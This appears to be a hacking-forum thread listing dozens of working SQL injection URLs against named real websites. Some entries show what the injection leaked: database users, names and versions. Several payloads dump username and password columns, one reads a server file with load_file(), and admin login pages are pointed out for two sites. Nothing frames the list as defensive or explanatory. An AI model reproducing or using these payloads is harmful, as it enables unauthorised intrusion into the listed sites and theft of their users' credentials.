Code: http://www.shooflypublishing.co.uk/news.php?id=-9+union+select+1,2,3,version(),5,6,7,8,9,10--
4.1.22 standard
Code: http://starkis.ru/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,user(),version(),database())--
starkis1@localhost:5.0.24-standard:db_starkis1
TIC 10
Code: http://www.fcshakhter.by/stat_docs.php?cid=-1+union+select+1,cast(concat_ws(0x3a,version(),database(),user())+as+binary),3,4,5--
4.1.11-Debian_4sarge8-log:fcshakhter:fcshakhter@localhost
Code: http://top.mlmbiz.ru/detail.php?id=207+and+substring(version(),1,1)=4
4.0.27-max-log
http://planit.cuna.org/12881/article.php?doc_id=-943'+union+select+1,2,3,4,5+--+
http://www.airram.com/gallery.php?categoryid=3+union+select+1,2,3,4,5,6,7,8,9+--+
http://businessandfinancemagazine.com/magazine.php?id=-59+union+select+1,concat_Ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+www_users+--+
http://www.pracawmetropolii.co.uk/search.php?id=-2869+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
http://bfbusinessclub.com/view.php?id=-552+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+--+
http://www.treasurevalleykidsdirectory.com/magazine.php?id=-55+union+select+1,2,concat_ws(0x3a3a,username,password)+from+users+/*+
k-konstruktor.ru - TC=10
http://www.k-konstruktor.ru/index.html?id=135&parent_id=5/**/and/**/1=2/**/union/**/all/**/select/**/1,1,1,1,1,version(),1,1/**/from/**/sys_users
version - 5.0.51a-24+lenny2-log
user - k_konstruktor_ru@localhost
database - k_konstruktor_ru
table - sys_users (user_password, user_login)
http://www.k-konstruktor.ru/index.html?id=135&parent_id=5/**/and/**/1=2/**/union/**/all/**/select/**/1,1,1,1,1,concat(user_login,0x3a,user_password),1,1/**/from/**/sys_users
admin panel - http://k-konstruktor.ru/admin/logon/index.html
Code: http://www.calvert-wire.com/show_product.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version())
Code: root@localhost:calvert_wirecom1:5.1.30-community
Code: http://www.calvert-wire.com/show_product.php?id=-1+union+select+load_file('C:/Inetpub/wwwroot/calvert-wire/show_product.php')
bbeheer@localhost:cvc:5.0.37-community
Code: http://www.cvc.nl/trainers.php?id=-25+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9--
ruf_user@localhost:ruf_http:5.0.45-community-nt
Code: http://www.rockiurbanfitness.com.au/trainers.php?id=-4+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version())--
tcbo01be@localhost:bosterhout:4.1.21-standard
Code: http://www.tcbosterhout.be/trainers.php?id=-9+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--
[email protected]:silencej:5.1.34-0.dotdeb.0
Code: http://www.pianc.org/edits/article.php?id=-4000501+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21--
http://www.zlinaero.com/eng/viewvideo.php?id=-4+union+select+1,2,group_concat(0x0b,column_name),4,5+from+information_schema.columns+where+table_name=0x61757468&img=
MySQL 5.0.77
http://www.zlinaero.com/eng/viewvideo.php?id=-4+union+select+1,2,group_concat(0x0b,id,0x3a,userid,0x3a,pass),4,5+from+auth&img=
auth::id, userid, pass, cognome, nome, permessi, vedimodi, expertmode, progettista, disegnatore, costo, attivo
Code: http://www.kingmotors.ru/view_car_sold.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
4.1.22-lk-log:kingmotors_king:kingmotors_king@localhostc-linux-gnu
Code: http://www.iglobalforum.com/conference_live.php?r=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a3a,user(),database(),version()),13,14,15,16,17,18,19,20+--+
rim1234@localhost:marmoon:5.0.51a-24+lenny1-log
Code: http://www.marmoon.com/games.php?id=-464+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13--
yoquiero_dan@localhost:yoquiero_games:4.1.22-standard
Code: http://www.yoquierogames.com/games.php?id=-98+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13--
rebous@localhost:rebounddb:4.1.22-log
Code: http://www.reboundsports.co.uk/tips-games.php?id=-34+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
Code: http://www.present-show.ru/corporate.php?id=-1+union+select+1,2,3,4,cast(concat_ws(0x3a,version(),database(),user())+as+binary),6,7,8,9,10,11--
4.1.11-standard:db_presentshowresentshow@localhost
Code: http://www.yamaha-center.ru/?vid=opis&obj=v&id=-3+union+select+concat_ws(0x3a,version(),database(),user()),2--
4.1.25-log:wwwkottedg_clubru_specuch:kottedgc_specuch@localhost
Code: http://www.mos-afisha.ru/?page=17&id=-3+union+select+concat_ws(0x3a,version(),database(),user())--
4.1.22-log:melbis:[email protected]
Code: http://backgammon.gambler.ru/tournir/arch.php?tournir_id=-11+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os)--
5.0.85:keks:keks@localhostortbld-freebsd7.2
Code: http://www.vashstile.ru/profile.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10--
5.0.22-log:admin_vashstile:admin_vashstile@localhost:unknown-freebsd6.0
Code: http://www.pin-code.ru/?pageId=1&subId=1+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10
5.0.77-logincodeincode@localhostortbld-freebsd6.3
Code: http://www.funkit.ru/index.php?deviceCatID=1/**/union/**/select/**/concat_ws(0x3a,user(),database(),version())
funkit@localhost:funkit:5.0.77
Code: http://www.9-ka.ru/index.php?nav=1'/**/union/**/select/**/1,concat_ws(0x3a,user(),database(),version()),3,4,5/*
only I have a problem here: it doesn't output the user
Code: http://feodorovski.spb.ru/katalog.php?vars=1+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
5.1.19-beta:feodorovski:feodorovski@localhostortbld-freebsd6.2
http://pecpl.ru/main/index.html?id=1&nid=2/**/and/**/1=7/**/union/**/all/**/select/**/1,user(),1,version(),1,1,1,1/**/from/**/sys_users/**/limit/**/0,1
user - pecpl_ru@localhost
version - 5.0.51a-24+lenny2-log
database - pecpl_ru
table - sys_users (user_login, user_password)
http://pecpl.ru/main/index.html?id=1&nid=2/**/and/**/1=7/**/union/**/all/**/select/**/1,user_login,3,user_password,5,6,7,8/**/from/**/sys_users/**/limit/**/0,1
adminpanel - http://pecpl.ru/admin/logon/index.html
Here is a small batch of SQL injections on fairly popular sites:
ГУ-ВШЭ: _http://www.hse.ru/pressa2002/default.php?show=123+and+ascii(lower(substring(version(),1,1)))=51
UpTime: _http://uptime.ru/downtime.php?host_id=-1+union+select+login,2,password,4,5,6,7,8,9,10,11,12+from+users+limit+1,1
МИОО: _http://www.mioo.ru/podrnews2.php?idvalue=2144+and+ascii(substring(version(),1,1))=53/*
ManageeCMS: _http://www.managee.ru/system/admin/?module=entry&action=edit&block=gallery&master_id=' (you need to log in at _http://www.managee.ru/demo/)
_http://managee.ru/search/?q=%27&strict=0
ПЦУО: _http://couo.ru/search.asp (enter ')